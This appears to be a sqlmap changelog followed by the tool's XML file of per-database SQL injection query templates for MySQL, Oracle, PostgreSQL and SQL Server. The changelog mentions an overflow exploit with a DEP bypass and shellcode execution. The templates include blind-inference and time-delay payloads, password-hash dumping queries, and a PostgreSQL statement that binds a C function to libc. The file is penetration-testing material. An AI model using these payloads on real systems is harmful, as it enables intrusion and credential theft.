89c43893d4
Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
<?xml version="1.0" encoding="UTF-8"?>
<!--
    Per-DBMS SQL query templates.

    Structure: <root> holds one <dbms value="..."> element per back-end (MySQL, Oracle,
    PostgreSQL, Microsoft SQL Server). Inside each, a leaf element's "query" attribute is a
    SQL fragment or statement containing printf-style placeholders (%s, %d) that are
    presumably substituted by the consumer at run time - confirm against the code that
    loads this file. Where an element also carries query2/query3 (or count2/condition2),
    these look like alternative formulations for the same purpose, e.g. a different catalog
    table for another server version; the order in which the consumer tries them is not
    visible here.

    Enumeration sections (users, passwords, privileges, dbs, tables, columns, dump_table)
    each contain an <inband> query that returns the whole result set at once and a <blind>
    query that returns one row per call (paginated with the back-end's limit syntax) together
    with a "count" query giving the number of rows to expect. The "condition" attribute on
    an <inband> element appears to name the column that the matching <blind> query filters on.

    The document deliberately has no DOCTYPE, entity declarations or processing instructions;
    a consumer can parse it with DTD and external-entity resolution disabled.
-->
<root>

    <!-- MySQL -->
    <dbms value="MySQL">
        <!-- Convert an arbitrary expression to a fixed-width string. -->
        <cast query="CAST(%s AS CHAR(10000))"/>
        <!-- Length of a string expression. -->
        <length query="LENGTH(%s)"/>
        <!-- Replace NULL with a single space so that concatenation never collapses to NULL. -->
        <isnull query="IFNULL(%s, ' ')"/>
        <!-- Token placed between values that are joined into one string. -->
        <delimiter query=","/>
        <!-- Row-pagination clause: first %d is the offset, second %d the row count. -->
        <limit query="LIMIT %d, %d"/>
        <!-- Regular expression recognising an existing pagination clause; limitgroupstart /
             limitgroupstop give the capture-group numbers of the offset and count. -->
        <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)"/>
        <limitgroupstart query="1"/>
        <limitgroupstop query="2"/>
        <!-- Literal keyword that introduces the pagination clause. -->
        <limitstring query=" LIMIT "/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
        <!-- Comment sequences accepted by this back-end. -->
        <comment query="#" query2="/*"/>
        <!--
            NOTE: MySQL 5.0.12 introduced SLEEP() function

            References:
            * http://dev.mysql.com/doc/refman/5.0/en/news-5-0-12.html
            * http://dev.mysql.com/doc/refman/5.1/en/miscellaneous-functions.html#function_sleep

            query2 is a CPU-bound fallback (BENCHMARK of five million MD5 calls) for servers
            without SLEEP(); its actual delay depends on server load rather than on %d.
        -->
        <timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
        <!-- Substring: (expression, 1-based start, length). -->
        <substring query="MID((%s), %d, %d)"/>
        <!-- Reduce a boolean condition to 1/0. -->
        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
        <!-- Boolean building block: compares the code point of one character of the
             expression (at position %d) with a threshold %d. -->
        <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
        <banner query="VERSION()"/>
        <current_user query="CURRENT_USER()"/>
        <current_db query="DATABASE()"/>
        <!-- True when the current account's super_priv flag in mysql.user is 'Y'. -->
        <is_dba query="(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y'"/>
        <!-- True when a user-defined function with the given name is registered in mysql.func;
             both %s are expected to receive the same name. -->
        <check_udf query="(SELECT name FROM mysql.func WHERE name='%s' LIMIT 0, 1)='%s'"/>
        <users>
            <inband query="SELECT grantee FROM information_schema.USER_PRIVILEGES" query2="SELECT user FROM mysql.user"/>
            <blind query="SELECT DISTINCT(grantee) FROM information_schema.USER_PRIVILEGES LIMIT %d, 1" query2="SELECT DISTINCT(user) FROM mysql.user LIMIT %d, 1" count="SELECT COUNT(DISTINCT(grantee)) FROM information_schema.USER_PRIVILEGES" count2="SELECT COUNT(DISTINCT(user)) FROM mysql.user"/>
        </users>
        <passwords>
            <!-- NOTE(review): reads mysql.user directly; presumably only succeeds for accounts that
                 can read that table - confirm. -->
            <inband query="SELECT user, password FROM mysql.user" condition="user"/>
            <blind query="SELECT DISTINCT(password) FROM mysql.user WHERE user='%s' LIMIT %d, 1" count="SELECT COUNT(DISTINCT(password)) FROM mysql.user WHERE user='%s'"/>
        </passwords>
        <privileges>
            <inband query="SELECT grantee, privilege_type FROM information_schema.USER_PRIVILEGES" condition="grantee" query2="SELECT user, select_priv, insert_priv, update_priv, delete_priv, create_priv, drop_priv, reload_priv, shutdown_priv, process_priv, file_priv, grant_priv, references_priv, index_priv, alter_priv, show_db_priv, super_priv, create_tmp_table_priv, lock_tables_priv, execute_priv, repl_slave_priv, repl_client_priv, create_view_priv, show_view_priv, create_routine_priv, alter_routine_priv, create_user_priv FROM mysql.user" condition2="user"/>
            <!-- Unlike the other blind queries, "grantee%s%s" takes two string placeholders
                 (presumably a comparison operator and a value) rather than a quoted literal. -->
            <blind query="SELECT DISTINCT(privilege_type) FROM information_schema.USER_PRIVILEGES WHERE grantee%s%s LIMIT %d, 1" query2="SELECT select_priv, insert_priv, update_priv, delete_priv, create_priv, drop_priv, reload_priv, shutdown_priv, process_priv, file_priv, grant_priv, references_priv, index_priv, alter_priv, show_db_priv, super_priv, create_tmp_table_priv, lock_tables_priv, execute_priv, repl_slave_priv, repl_client_priv, create_view_priv, show_view_priv, create_routine_priv, alter_routine_priv, create_user_priv FROM mysql.user WHERE user='%s' LIMIT %d, 1" count="SELECT COUNT(DISTINCT(privilege_type)) FROM information_schema.USER_PRIVILEGES WHERE grantee%s%s" count2="SELECT COUNT(*) FROM mysql.user WHERE user='%s'"/>
        </privileges>
        <dbs>
            <inband query="SELECT schema_name FROM information_schema.SCHEMATA" query2="SELECT db FROM mysql.db"/>
            <blind query="SELECT DISTINCT(schema_name) FROM information_schema.SCHEMATA LIMIT %d, 1" query2="SELECT DISTINCT(db) FROM mysql.db LIMIT %d, 1" count="SELECT COUNT(DISTINCT(schema_name)) FROM information_schema.SCHEMATA" count2="SELECT COUNT(DISTINCT(db)) FROM mysql.db"/>
        </dbs>
        <tables>
            <inband query="SELECT table_schema, table_name FROM information_schema.TABLES" condition="table_schema"/>
            <blind query="SELECT table_name FROM information_schema.TABLES WHERE table_schema='%s' LIMIT %d, 1" count="SELECT COUNT(table_name) FROM information_schema.TABLES WHERE table_schema='%s'"/>
        </tables>
        <columns>
            <!-- Placeholders: table name, then schema name. -->
            <inband query="SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s'"/>
            <!-- query2 fetches the type of one column: table name, column name, schema name. -->
            <blind query="SELECT column_name FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s' LIMIT %d, 1" query2="SELECT column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s'"/>
        </columns>
        <dump_table>
            <!-- Placeholders: column list, schema name, table name. -->
            <inband query="SELECT %s FROM %s.%s"/>
            <blind query="SELECT %s FROM %s.%s LIMIT %d, 1" count="SELECT COUNT(*) FROM %s.%s"/>
        </dump_table>
    </dbms>

    <!-- Oracle -->
    <dbms value="Oracle">
        <cast query="CAST(%s AS VARCHAR(4000))"/>
        <length query="LENGTH(%s)"/>
        <isnull query="NVL(%s, ' ')"/>
        <delimiter query="||"/>
        <!-- Not a standalone clause: this fragment closes a "SELECT ..., ROWNUM AS LIMIT FROM (...)"
             wrapper, as used by the blind queries below. -->
        <limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
        <!-- Either the ROWNUM-AS-LIMIT wrapper or a bare "ROWNUM = n"; no capture groups, hence the
             three empty elements that follow. -->
        <limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
        <limitgroupstart/>
        <limitgroupstop/>
        <limitstring/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
        <comment query="--"/>
        <!-- NOTE(review): query3 appends a literal "00" to %d, which suggests USER_LOCK.SLEEP takes a
             finer time unit than the seconds used by DBMS_LOCK.SLEEP - confirm before relying on it. -->
        <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/>
        <substring query="SUBSTR((%s), %d, %d)"/>
        <!-- Oracle requires a FROM clause, hence FROM DUAL. -->
        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
        <inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
        <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
        <current_user query="SELECT SYS.LOGIN_USER FROM DUAL"/>
        <current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
        <!-- True when the current login has been granted the DBA role. -->
        <is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER AND GRANTED_ROLE='DBA')='DBA'"/>
        <users>
            <inband query="SELECT USERNAME FROM SYS.ALL_USERS"/>
            <!-- Blind pagination wraps the query so ROWNUM can be compared after DISTINCT is applied. -->
            <blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
        </users>
        <passwords>
            <inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
            <blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
        </passwords>
        <privileges>
            <inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" condition="GRANTEE"/>
            <blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'"/>
        </privileges>
        <!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
        <dbs/>
        <tables>
            <!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
            <inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
            <blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
        </tables>
        <columns>
            <!-- Filters on TABLE_NAME only (no owner/tablespace), so same-named tables in several
                 schemas would be merged. -->
            <inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'"/>
            <blind query="SELECT COLUMN_NAME FROM (SELECT COLUMN_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s') WHERE LIMIT=%d" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'"/>
        </columns>
        <dump_table>
            <!-- Placeholders: column list, table name (the blind form repeats the column list). -->
            <inband query="SELECT %s FROM %s"/>
            <blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
        </dump_table>
    </dbms>

    <!-- PostgreSQL -->
    <dbms value="PostgreSQL">
        <cast query="CAST(%s AS CHARACTER(10000))"/>
        <length query="LENGTH(%s)"/>
        <isnull query="COALESCE(%s, ' ')"/>
        <delimiter query="||"/>
        <!-- Row-pagination clause: first %d is the offset, second %d the row count. -->
        <limit query="OFFSET %d LIMIT %d"/>
        <limitregexp query="\s+OFFSET\s+([\d]+)\s+LIMIT\s+([\d]+)"/>
        <limitgroupstart query="1"/>
        <limitgroupstop query="2"/>
        <limitstring query=" OFFSET "/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
        <comment query="--" query2="/*"/>
        <!--
            NOTE: PostgreSQL 8.2 introduced PG_SLEEP() function

            References:
            * http://www.postgresql.org/docs/8.3/interactive/release-8-2.html
            * http://www.postgresql.org/docs/8.3/interactive/functions-datetime.html#FUNCTIONS-DATETIME-DELAY

            query2 is a CPU-bound fallback (generate_series of three million rows) whose delay is
            load-dependent rather than tied to %d.

            NOTE(review): query3 is not a read-only statement - it is DDL that binds a C-language
            function to a libc symbol and leaves a persistent function named sleep(int) behind.
            It is therefore far more visible in server logs than the other two and presumably only
            works for accounts allowed to create C-language functions; confirm that the consumer
            removes the function afterwards.
        -->
        <timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 3000000))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
        <!-- The ::text cast makes SUBSTR usable on non-string expressions. -->
        <substring query="SUBSTR((%s)::text, %d, %d)"/>
        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
        <inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
        <banner query="VERSION()"/>
        <current_user query="CURRENT_USER"/>
        <current_db query="CURRENT_DATABASE()"/>
        <!-- True when pg_user.usesuper is set for the current role. -->
        <is_dba query="(SELECT usesuper=true FROM pg_user WHERE usename=CURRENT_USER OFFSET 0 LIMIT 1)"/>
        <!-- True when a function of the given name exists in pg_proc; both %s receive the same name. -->
        <check_udf query="(SELECT proname='%s' FROM pg_proc WHERE proname='%s' OFFSET 0 LIMIT 1)"/>
        <users>
            <inband query="SELECT usename FROM pg_user"/>
            <blind query="SELECT DISTINCT(usename) FROM pg_user OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(usename)) FROM pg_user"/>
        </users>
        <passwords>
            <!-- NOTE(review): pg_shadow (unlike pg_user) is the restricted catalog view; presumably only
                 readable by superusers - confirm. -->
            <inband query="SELECT usename, passwd FROM pg_shadow" condition="usename"/>
            <blind query="SELECT DISTINCT(passwd) FROM pg_shadow WHERE usename='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(passwd)) FROM pg_shadow WHERE usename='%s'"/>
        </passwords>
        <privileges>
            <!-- Boolean role flags are projected to 1/0 columns: usecreatedb, usesuper, usecatupd. -->
            <inband query="SELECT usename, (CASE WHEN usecreatedb THEN 1 ELSE 0 END), (CASE WHEN usesuper THEN 1 ELSE 0 END), (CASE WHEN usecatupd THEN 1 ELSE 0 END) FROM pg_user" condition="usename"/>
            <blind query="SELECT (CASE WHEN usecreatedb THEN 1 ELSE 0 END), (CASE WHEN usesuper THEN 1 ELSE 0 END), (CASE WHEN usecatupd THEN 1 ELSE 0 END) FROM pg_user WHERE usename='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(usename)) FROM pg_user WHERE usename='%s'"/>
        </privileges>
        <dbs>
            <inband query="SELECT datname FROM pg_database"/>
            <blind query="SELECT DISTINCT(datname) FROM pg_database OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(datname)) FROM pg_database"/>
        </dbs>
        <tables>
            <inband query="SELECT schemaname, tablename FROM pg_tables" condition="schemaname"/>
            <blind query="SELECT tablename FROM pg_tables WHERE schemaname='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(tablename) FROM pg_tables WHERE schemaname='%s'"/>
        </tables>
        <columns>
            <!-- Joins pg_attribute to pg_class, pg_type and pg_namespace; attnum>0 excludes system
                 columns. Placeholders: relation name, then schema (nspname). -->
            <inband query="SELECT attname, typname FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s'"/>
            <!-- query2 placeholders differ in order: relation name, column name, schema. -->
            <blind query="SELECT attname FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s' OFFSET %d LIMIT 1" query2="SELECT typname FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relname='%s' AND a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND attname='%s' AND nspname='%s'" count="SELECT COUNT(attname) FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s'"/>
        </columns>
        <dump_table>
            <!-- Placeholders: column list, schema name, table name. -->
            <inband query="SELECT %s FROM %s.%s"/>
            <blind query="SELECT %s FROM %s.%s OFFSET %d LIMIT 1" count="SELECT COUNT(*) FROM %s.%s"/>
        </dump_table>
    </dbms>

    <!-- Microsoft SQL Server -->
    <dbms value="Microsoft SQL Server">
        <cast query="CAST(%s AS VARCHAR(8000))"/>
        <!-- LEN() yields a number; STR()/LTRIM turn it into a trimmed string like the other back-ends. -->
        <length query="LTRIM(STR(LEN(%s)))"/>
        <isnull query="ISNULL(%s, ' ')"/>
        <delimiter query="+"/>
        <!-- Pagination is expressed with TOP rather than a trailing clause, so this is a SELECT prefix. -->
        <limit query="SELECT TOP %d "/>
        <!-- Group 1 is the outer TOP, group 2 the TOP of the NOT IN subquery, which is why
             limitgroupstart/limitgroupstop are swapped relative to MySQL and PostgreSQL. -->
        <limitregexp query="TOP\s+([\d]+)\s+.+?\s+FROM\s+.+?\s+WHERE\s+.+?\s+NOT\s+IN\s+\(SELECT\s+TOP\s+([\d]+)\s+"/>
        <limitgroupstart query="2"/>
        <limitgroupstop query="1"/>
        <limitstring/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
        <comment query="--" query2="/*"/>
        <!-- Delay in hh:mm:ss form; %d fills the seconds field only. -->
        <timedelay query="WAITFOR DELAY '0:0:%d'"/>
        <substring query="SUBSTRING((%s), %d, %d)"/>
        <!-- NOTE(review): yields the strings '1'/'0' whereas the other back-ends yield integers
             1/0 - consumers comparing the result must account for this. -->
        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
        <inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
        <banner query="@@VERSION"/>
        <current_user query="SYSTEM_USER"/>
        <current_db query="DB_NAME()"/>
        <!-- True when the current login is a member of the sysadmin server role. -->
        <is_dba query="IS_SRVROLEMEMBER('sysadmin')=1"/>
        <users>
            <inband query="SELECT name FROM master..syslogins" query2="SELECT name FROM sys.sql_logins"/>
            <!-- NOTE(review): neither the outer nor the inner SELECT here has an ORDER BY, unlike the
                 dbs and tables queries below; TOP ... NOT IN (SELECT TOP ...) pagination without a
                 stable order can skip or repeat rows. -->
            <blind query="SELECT TOP 1 name FROM master..syslogins WHERE name NOT IN (SELECT TOP %d name FROM master..syslogins)" query2="SELECT TOP 1 name FROM sys.sql_logins WHERE name NOT IN (SELECT TOP %d name FROM sys.sql_logins)" count="SELECT LTRIM(STR(COUNT(name))) FROM master..syslogins" count2="SELECT LTRIM(STR(COUNT(name))) FROM sys.sql_logins"/>
        </users>
        <passwords>
            <!-- query uses the older master..sysxlogins catalog, query2 the newer sys.sql_logins view;
                 the hash is rendered as a hex string via fn_varbintohexstr. -->
            <inband query="SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins" query2="SELECT name, master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins" condition="name"/>
            <!-- Same ordering caveat as the users blind query: no ORDER BY on either SELECT. -->
            <blind query="SELECT TOP 1 master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins WHERE name='%s' AND name NOT IN (SELECT TOP %d name FROM master..sysxlogins WHERE name='%s')" query2="SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='%s' AND name NOT IN (SELECT TOP %d name FROM sys.sql_logins WHERE name='%s')" count="SELECT LTRIM(STR(COUNT(password))) FROM master..sysxlogins WHERE name='%s'" count2="SELECT LTRIM(STR(COUNT(password_hash))) FROM sys.sql_logins WHERE name='%s'"/>
        </passwords>
        <!-- NOTE: in Microsoft SQL Server there is no query to enumerate DBMS users privileges -->
        <privileges/>
        <dbs>
            <inband query="SELECT name FROM master..sysdatabases"/>
            <blind query="SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP %d name FROM master..sysdatabases ORDER BY name) ORDER BY name" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/>
        </dbs>
        <tables>
            <!-- %s is the database name; xtype 'u'/'v' selects user tables and views. -->
            <inband query="SELECT name FROM %s..sysobjects WHERE xtype IN ('u', 'v')"/>
            <!-- The database name is repeated: once for the outer query, once for the subquery. -->
            <blind query="SELECT TOP 1 name FROM %s..sysobjects WHERE xtype IN ('u', 'v') AND name NOT IN (SELECT TOP %d name FROM %s..sysobjects WHERE xtype IN ('u', 'v') ORDER BY name ASC) ORDER BY name ASC" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE xtype IN ('u', 'v')"/>
        </tables>
        <columns>
            <!-- The database name is repeated seven times, followed by the table name as the last %s. -->
            <inband query="SELECT %s..syscolumns.name, TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'"/>
            <!-- NOTE(review): the row index is "TOP %s" here while every other blind query uses "TOP %d";
                 the consumer must pass a string for this one. Pagination is done by taking the first
                 N names ascending and then the last of those descending. -->
            <blind query="SELECT TOP 1 name FROM (SELECT TOP %s name FROM %s..syscolumns WHERE id=(SELECT id FROM %s..sysobjects WHERE name='%s') ORDER BY name ASC) CTABLE ORDER BY name DESC" query2="SELECT TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.name='%s' AND %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..syscolumns WHERE id=(SELECT id FROM %s..sysobjects WHERE name='%s')"/>
        </columns>
        <dump_table>
            <!-- Placeholders: column list, database name, table name. The blind form repeats the
                 column list as the NOT IN key, so it is only reliable when that list is a single
                 unique column. -->
            <inband query="SELECT %s FROM %s..%s"/>
            <blind query="SELECT TOP 1 %s FROM %s..%s WHERE %s NOT IN (SELECT TOP %d %s FROM %s..%s)" count="SELECT LTRIM(STR(COUNT(*))) FROM %s..%s"/>
        </dump_table>
    </dbms>

</root>